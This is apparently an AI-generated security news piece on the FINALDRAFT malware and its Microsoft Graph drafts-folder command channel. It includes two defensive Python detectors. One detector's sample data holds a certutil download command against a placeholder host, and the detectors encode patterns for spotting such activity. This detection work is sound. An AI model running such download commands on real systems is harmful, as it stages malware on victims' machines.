

Ethical Hacking News

FINALDRAFT Malware Exploits Microsoft Graph API for Espionage: A Threat Analysis



A new and sophisticated piece of malware, dubbed FINALDRAFT, has been identified abusing the Microsoft Graph API for espionage purposes. The campaign, attributed to a threat cluster tracked as REF7707, has been detected in multiple countries and is characterized by a well-engineered intrusion set that grants remote access to infected hosts. The malware is written in C++, can load and execute additional modules on the fly, and abuses the Outlook email service via the Microsoft Graph API for command-and-control.

  • The FINALDRAFT malware exploits the Microsoft Graph API for espionage purposes.
  • The malware grants remote access to infected hosts and executes PowerShell commands without invoking "powershell.exe".
  • The attackers use a well-engineered intrusion set, including legitimate utilities like PowerPick and certutil, to evade detection.
  • The malware downloads additional payloads from a web server associated with the Foreign Ministry's website using Microsoft's certutil application.
  • The attackers abuse Outlook email service via the Microsoft Graph API for command-and-control purposes.
  • FINALDRAFT is sophisticated malware that uses unique techniques, but the campaign shows poor operational management and inconsistencies in evasion practices.
  • The discovery of FINALDRAFT highlights the importance of keeping software up-to-date, using robust security measures, and continuous monitoring.



    The cybersecurity landscape has recently witnessed a new and sophisticated malware family, dubbed FINALDRAFT, which security researchers have identified abusing the Microsoft Graph API for espionage purposes. The campaign, attributed to a threat cluster known as REF7707, has been detected in multiple countries, including an unnamed South American nation, Southeast Asia, and the United States.

    The REF7707 campaign is characterized by a well-engineered intrusion set that grants remote access to infected hosts, allowing the attackers to execute PowerShell commands without invoking the "powershell.exe" binary. This evasion technique enables the threat actors to avoid detection by traditional security measures. Furthermore, the malicious code patches several APIs to evade event tracing for Windows (ETW) and launches PowerPick, a legitimate utility that is part of the Empire post-exploitation toolkit.

    The malware's behavior involves downloading additional payloads from a web server associated with the foreign ministry's website using Microsoft's certutil application. The certutil commands are executed via the Windows Remote Management's Remote Shell plugin (WinrsHost.exe) from an unknown source system on a connected network, indicating that the attackers already possessed valid network credentials.

    The first of the files to be executed is a malware named PATHLOADER that allows for the execution of encrypted shellcode received from an external server. The extracted shellcode, dubbed FINALDRAFT, is subsequently injected into the memory of a newly-spawned "mspaint.exe" process. This malware is written in C++ and comes fitted with capabilities to execute additional modules on the fly.
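As an added example (not code from the article or from the researchers who analysed REF7707), the following Python triage function checks constructed process-creation events for the chain described above: certutil fetching a payload while running under WinRM's remote shell host, and mspaint.exe spawned by a parent that is not the interactive shell. The event field names, the sample values and the expected-parent list are assumptions.

```python
import re

# Constructed, simplified process-creation events (Sysmon-style field names
# are an assumption); not real telemetry from the REF7707 intrusion.
SAMPLE_EVENTS = [
    {"host": "srv01", "parent_image": r"C:\Windows\System32\WinrsHost.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://example.invalid/update.bin C:\\Users\\Public\\update.bin"},
    {"host": "srv01", "parent_image": r"C:\Windows\System32\WinrsHost.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c whoami"},
    {"host": "ws07", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -hashfile C:\\tools\\setup.msi SHA256"},
    {"host": "ws07", "parent_image": r"C:\Users\Public\update.bin",
     "image": r"C:\Windows\System32\mspaint.exe", "cmdline": "mspaint.exe"},
]

# certutil switch that turns the tool into a downloader.
DOWNLOAD_SWITCH = re.compile(r"-urlcache\b", re.IGNORECASE)
# Parents from which a user would normally launch Paint (assumed allowlist).
EXPECTED_MSPAINT_PARENTS = {"explorer.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (host, rule, detail) tuples for events matching the REF7707
    chain: certutil downloads (worse when the parent is WinrsHost.exe) and
    mspaint.exe started by an unexpected parent, a sign of injection staging."""
    hits = []
    for ev in events:
        image, parent = basename(ev["image"]), basename(ev["parent_image"])
        if image == "certutil.exe" and DOWNLOAD_SWITCH.search(ev["cmdline"]):
            rule = "certutil_download_via_winrs" if parent == "winrshost.exe" else "certutil_download"
            hits.append((ev["host"], rule, ev["cmdline"]))
        if image == "mspaint.exe" and parent not in EXPECTED_MSPAINT_PARENTS:
            hits.append((ev["host"], "mspaint_unusual_parent", ev["parent_image"]))
    return hits
```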

    FINALDRAFT abuses the Outlook email service via the Microsoft Graph API for command-and-control (C2) purposes. The communication mechanism entails parsing the commands stored in the mailbox's drafts folder and writing the results of the execution into new draft emails for each command. This malware registers 37 command handlers that are designed around process injection, file manipulation, and network proxy capabilities.
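As an added example, not code from the article, this Python heuristic scans constructed, simplified mailbox-audit records for the churn the drafts-folder C2 channel described above would produce: many Drafts-folder creates from one client application in a short window, with nothing ever sent. The record fields and application identifiers are assumed placeholders, not real Exchange audit schema values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified mailbox-audit records (field names are an
# assumption loosely modelled on mailbox auditing); not REF7707 data.
BASE = datetime(2025, 2, 13, 4, 0)


def _rec(mailbox, app_id, operation, folder, minute):
    return {"mailbox": mailbox, "app_id": app_id, "operation": operation,
            "folder": folder, "time": BASE + timedelta(minutes=minute)}


SAMPLE_RECORDS = (
    # Suspect: six drafts created and hard-deleted within minutes, never sent.
    [_rec("victim@example.invalid", "app-id-placeholder", "Create", "Drafts", m) for m in range(6)]
    + [_rec("victim@example.invalid", "app-id-placeholder", "HardDelete", "Drafts", m + 1) for m in range(6)]
    # Benign: a user drafts a message in Outlook and eventually sends it.
    + [_rec("alice@example.invalid", "outlook-placeholder", "Create", "Drafts", 0),
       _rec("alice@example.invalid", "outlook-placeholder", "Update", "Drafts", 3),
       _rec("alice@example.invalid", "outlook-placeholder", "Send", "Drafts", 5)]
)


def draft_c2_candidates(records, window=timedelta(minutes=10), min_drafts=5):
    """Return (mailbox, app_id) pairs whose client creates at least
    `min_drafts` draft messages inside `window` and never sends anything:
    the pattern a drafts-folder command channel leaves behind."""
    by_client = defaultdict(list)
    for r in records:
        by_client[(r["mailbox"], r["app_id"])].append(r)
    flagged = []
    for key, recs in by_client.items():
        if any(r["operation"] == "Send" for r in recs):
            continue  # heuristic: an interactive client eventually sends mail
        creates = sorted(r["time"] for r in recs
                         if r["operation"] == "Create" and r["folder"] == "Drafts")
        # Sliding window over the create timestamps.
        for i, start in enumerate(creates):
            if sum(1 for t in creates[i:] if t - start <= window) >= min_drafts:
                flagged.append(key)
                break
    return flagged
```

Tune `window` and `min_drafts` against a baseline of the tenant's own draft activity before alerting on the result.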

    The use of the Microsoft Graph API by FINALDRAFT is noteworthy, as it has been previously detected in another backdoor named SIESTAGRAPH. However, the way this API is being exploited by FINALDRAFT is unique and highlights the sophistication of the threat actor's techniques.

    Beyond the intrusion set itself, the attackers' use of legitimate utilities such as PowerPick and certutil adds an extra layer of complexity to the attack, making it harder for security researchers to detect and analyze.

    At the same time, the campaign's poor operational management and inconsistent evasion practices are noteworthy. While the threat actors have demonstrated a high level of technical expertise, their lack of attention to detail has produced inconsistencies in their tradecraft that give defenders and researchers opportunities to detect and track the activity.

    REF7707 is the name given to the threat cluster behind several related malicious campaigns, including one targeting a foreign ministry in an unnamed South American nation. The cluster's activity also targets a telecommunications entity and a university located in Southeast Asia.

    The exact initial access vector used in the attacks is currently not clear, although Microsoft's certutil application was observed downloading additional payloads from a web server associated with the foreign ministry's website, with the commands arriving over WinRM from another host on the network. This suggests that the attackers already possessed valid network credentials and were using them for lateral movement from a previously compromised host in the environment.

    The discovery of FINALDRAFT malware highlights the importance of keeping software up-to-date, using robust security measures, and being cautious when interacting with unknown or untrusted sources. Furthermore, it emphasizes the need for continuous monitoring and analysis of network activity to detect and respond to emerging threats.

    In conclusion, the REF7707 campaign and the exploitation of the Microsoft Graph API by FINALDRAFT malware represent a significant threat to organizations worldwide. The use of sophisticated techniques, combined with poor campaign management, makes this threat actor a force to be reckoned with in the world of cybersecurity.



    Related Information:

  • https://thehackernews.com/2025/02/finaldraft-malware-exploits-microsoft.html

  • https://cyberinsider.com/new-finaldraft-malware-uses-microsoft-outlook-for-espionage/


  • Published: Thu Feb 13 04:33:33 2025 by llama3.2 3B Q4_K_M














